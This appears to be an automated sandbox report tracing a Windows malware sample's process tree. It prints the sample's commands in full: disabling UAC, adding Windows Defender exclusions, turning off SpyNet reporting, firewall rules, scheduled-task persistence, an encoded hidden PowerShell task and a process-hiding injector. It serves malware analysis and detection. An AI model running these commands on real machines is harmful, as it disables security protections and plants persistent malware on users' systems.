yYUJfEya7aGR6tNtQfr4w8RQ.exe 282 PID 3412 wrote to memory of 776 3412 CasPol.exe 107 PID 3412 wrote to memory of 776 3412 CasPol.exe 107 PID 3412 wrote to memory of 1040 3412 CasPol.exe 124 PID 3412 wrote to memory of 1040 3412 CasPol.exe 124 PID 3412 wrote to memory of 1040 3412 CasPol.exe 124 PID 1040 wrote to memory of 3940 1040 jLF0fxs2rPLfiAzDNp4zK87P.exe 133 PID 1040 wrote to memory of 3940 1040 jLF0fxs2rPLfiAzDNp4zK87P.exe 133 PID 1040 wrote to memory of 3940 1040 jLF0fxs2rPLfiAzDNp4zK87P.exe 133 PID 3940 wrote to memory of 5008 3940 Install.exe 154 PID 3940 wrote to memory of 5008 3940 Install.exe 154 PID 3940 wrote to memory of 5008 3940 Install.exe 154 PID 1396 wrote to memory of 3196 1396 yYUJfEya7aGR6tNtQfr4w8RQ.exe 149 PID 1396 wrote to memory of 3196 1396 yYUJfEya7aGR6tNtQfr4w8RQ.exe 149 PID 1396 wrote to memory of 3196 1396 yYUJfEya7aGR6tNtQfr4w8RQ.exe 149 PID 2044 wrote to memory of 3532 2044 xEI0gwQdOGW8IAEvvfbrgSfV.exe 151 PID 2044 wrote to memory of 3532 2044 xEI0gwQdOGW8IAEvvfbrgSfV.exe 151 PID 2044 wrote to memory of 3532 2044 xEI0gwQdOGW8IAEvvfbrgSfV.exe 151 PID 5008 wrote to memory of 4748 5008 Install.exe 247 PID 5008 wrote to memory of 4748 5008 Install.exe 247 PID 5008 wrote to memory of 4748 5008 Install.exe 247 PID 5008 wrote to memory of 1600 5008 Install.exe 290 PID 5008 wrote to memory of 1600 5008 Install.exe 290 PID 5008 wrote to memory of 1600 5008 Install.exe 290 PID 4748 wrote to memory of 2984 4748 WerFault.exe 416 PID 4748 wrote to memory of 2984 4748 WerFault.exe 416 PID 4748 wrote to memory of 2984 4748 WerFault.exe 416 PID 1600 wrote to memory of 3468 1600 Conhost.exe 178 PID 1600 wrote to memory of 3468 1600 Conhost.exe 178 PID 1600 wrote to memory of 3468 1600 Conhost.exe 178 PID 3468 wrote to memory of 3028 3468 cmd.exe 377 PID 3468 wrote to memory of 3028 3468 cmd.exe 377 PID 3468 wrote to memory of 3028 3468 cmd.exe 377 PID 3412 wrote to memory of 4276 3412 CasPol.exe 203 PID 3412 wrote to memory of 4276 3412 CasPol.exe 203 PID 3412 wrote to memory of 4276 3412 CasPol.exe 203 PID 3468 wrote to memory of 1700 3468 cmd.exe 175 PID 3468 wrote to memory of 1700 3468 cmd.exe 175 PID 3468 wrote to memory of 1700 3468 cmd.exe 175 PID 2984 wrote to memory of 2648 2984 cmd.exe 169 PID 2984 wrote to memory of 2648 2984 cmd.exe 169 PID 2984 wrote to memory of 2648 2984 cmd.exe 169 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe"C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe"1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4216 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Users\Admin\Pictures\yYUJfEya7aGR6tNtQfr4w8RQ.exe"C:\Users\Admin\Pictures\yYUJfEya7aGR6tNtQfr4w8RQ.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 3924⤵
- Program crash
PID:3388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 4164⤵
- Program crash
PID:2196
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 7764⤵
- Program crash
PID:3196
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 7844⤵
- Program crash
PID:2344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 8804⤵
- Program crash
PID:4140
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 6484⤵
- Program crash
PID:4360
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 9284⤵
- Program crash
PID:3720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 9564⤵
- Program crash
PID:2780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 9324⤵
- Program crash
PID:1832
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:3980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 9444⤵
- Program crash
PID:3812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 7564⤵
- Program crash
PID:4532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 8604⤵
- Program crash
PID:4544
-
-
C:\Users\Admin\Pictures\yYUJfEya7aGR6tNtQfr4w8RQ.exe"C:\Users\Admin\Pictures\yYUJfEya7aGR6tNtQfr4w8RQ.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 3605⤵
- Program crash
PID:2008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 3765⤵
- Program crash
PID:1624
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 3925⤵
- Program crash
PID:2948
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 7125⤵
- Program crash
PID:3456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 7125⤵
- Program crash
PID:4764
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 7365⤵
- Program crash
PID:4852
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 7125⤵
- Program crash
PID:1912
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 7685⤵
- Program crash
PID:4288
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 6685⤵
- Program crash
PID:908
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:400
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:3888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 7045⤵
- Program crash
PID:1468
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:3968
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
PID:5028 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 3926⤵
- Program crash
PID:1680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 4086⤵
- Program crash
PID:3888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 4206⤵
- Program crash
- Suspicious use of WriteProcessMemory
PID:4748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 7446⤵
- Program crash
PID:3000
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 7806⤵
- Program crash
PID:1068
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 8126⤵
- Program crash
PID:2928
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4764
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 7886⤵
- Program crash
PID:3864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 7446⤵PID:2100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 7046⤵PID:5036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 9806⤵PID:3640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 10006⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 8686⤵PID:4084
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:1356
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:1596
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:3508
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4988
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 9166⤵PID:4648
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 9326⤵PID:4388
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵PID:4508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 9326⤵PID:4676
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:2992
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵PID:4220
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:1820
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
PID:4256
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 11526⤵PID:412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 11366⤵PID:4616
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 11486⤵PID:2616
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 11366⤵PID:4240
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 7564⤵
- Program crash
PID:4840 -
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:325⤵PID:8
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 7564⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Program crash
PID:4276 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042054071\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042054071\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"5⤵PID:1336
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042054071\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042054071\assistant\assistant_installer.exe" --version5⤵PID:3364
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042054071\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042054071\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0xa42614,0xa42620,0xa4262c6⤵PID:2316
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 7324⤵
- Program crash
PID:660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 6964⤵
- Program crash
PID:2340
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 4084⤵
- Program crash
PID:1584
-
-
-
C:\Users\Admin\Pictures\xEI0gwQdOGW8IAEvvfbrgSfV.exe"C:\Users\Admin\Pictures\xEI0gwQdOGW8IAEvvfbrgSfV.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:488 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 3964⤵
- Program crash
PID:4736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 4124⤵
- Program crash
PID:4616
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 7084⤵
- Program crash
PID:3116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 7484⤵
- Program crash
PID:904
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 7644⤵
- Program crash
PID:2076
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 7724⤵
- Program crash
PID:3556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 7844⤵
- Program crash
PID:4288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 9764⤵
- Program crash
PID:4736
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:4064
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 10044⤵
- Program crash
PID:908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 8244⤵
- Program crash
PID:1624
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 9684⤵
- Program crash
PID:4796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 9444⤵
- Program crash
PID:4848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 10124⤵
- Program crash
PID:4156
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 9644⤵
- Program crash
PID:4684
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 9484⤵
- Program crash
PID:2524
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 7084⤵
- Program crash
PID:892
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 7844⤵
- Program crash
PID:2564
-
-
C:\Users\Admin\Pictures\xEI0gwQdOGW8IAEvvfbrgSfV.exe"C:\Users\Admin\Pictures\xEI0gwQdOGW8IAEvvfbrgSfV.exe"4⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 3605⤵
- Program crash
PID:1136
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 3765⤵
- Program crash
PID:1744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 7125⤵
- Program crash
PID:2564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 7405⤵
- Program crash
PID:2768
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 7365⤵
- Program crash
PID:2328
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 7125⤵
- Program crash
PID:4652
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 7685⤵
- Program crash
PID:132
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 6685⤵
- Program crash
PID:4660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 3805⤵
- Program crash
PID:4388
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:4524
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4852
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 9725⤵
- Program crash
PID:2716
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 9125⤵
- Program crash
PID:692
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 6964⤵
- Program crash
PID:3660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 2924⤵
- Program crash
PID:1832
-
-
-
C:\Users\Admin\Pictures\MH4vHdSKdQvLchJ0U7Qk7K5X.exe"C:\Users\Admin\Pictures\MH4vHdSKdQvLchJ0U7Qk7K5X.exe"3⤵
- Executes dropped EXE
PID:776
-
-
C:\Users\Admin\Pictures\jLF0fxs2rPLfiAzDNp4zK87P.exe"C:\Users\Admin\Pictures\jLF0fxs2rPLfiAzDNp4zK87P.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Users\Admin\AppData\Local\Temp\7zS8D8A.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Users\Admin\AppData\Local\Temp\7zS8FFB.tmp\Install.exe.\Install.exe /JPdidKxawB "385118" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Checks for any installed AV software in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:4748
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:2984
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:1600
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵
- Suspicious use of WriteProcessMemory
PID:3468
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grXmAizKI" /SC once /ST 17:22:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:4308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "grXmAizKI"6⤵PID:1136
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "grXmAizKI"6⤵PID:2872
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3888
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvgvHgqNgKCzXIKVFa" /SC once /ST 20:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\ODAyBFZ.exe\" Lc /wKsite_idtLu 385118 /S" /V1 /F6⤵
- Creates scheduled task(s)
PID:3044
-
-
-
-
-
C:\Users\Admin\Pictures\IgCBQGLVZvnO0Gn4aYk2USBy.exe"C:\Users\Admin\Pictures\IgCBQGLVZvnO0Gn4aYk2USBy.exe" --silent --allusers=03⤵PID:4276
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3708 -ip 37081⤵PID:792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 3708 -ip 37081⤵PID:3912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3708 -ip 37081⤵PID:1120
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3708 -ip 37081⤵PID:3028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 488 -ip 4881⤵PID:1772
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3708 -ip 37081⤵PID:3060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 488 -ip 4881⤵PID:1232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 488 -ip 4881⤵PID:2092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3708 -ip 37081⤵PID:1416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 488 -ip 4881⤵PID:796
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 488 -ip 4881⤵PID:2652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3708 -ip 37081⤵PID:1040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 488 -ip 4881⤵PID:3440
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 488 -ip 4881⤵PID:4260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3708 -ip 37081⤵PID:3164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 488 -ip 4881⤵PID:2512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3708 -ip 37081⤵PID:1744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 488 -ip 4881⤵PID:3292
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 488 -ip 4881⤵PID:2196
-
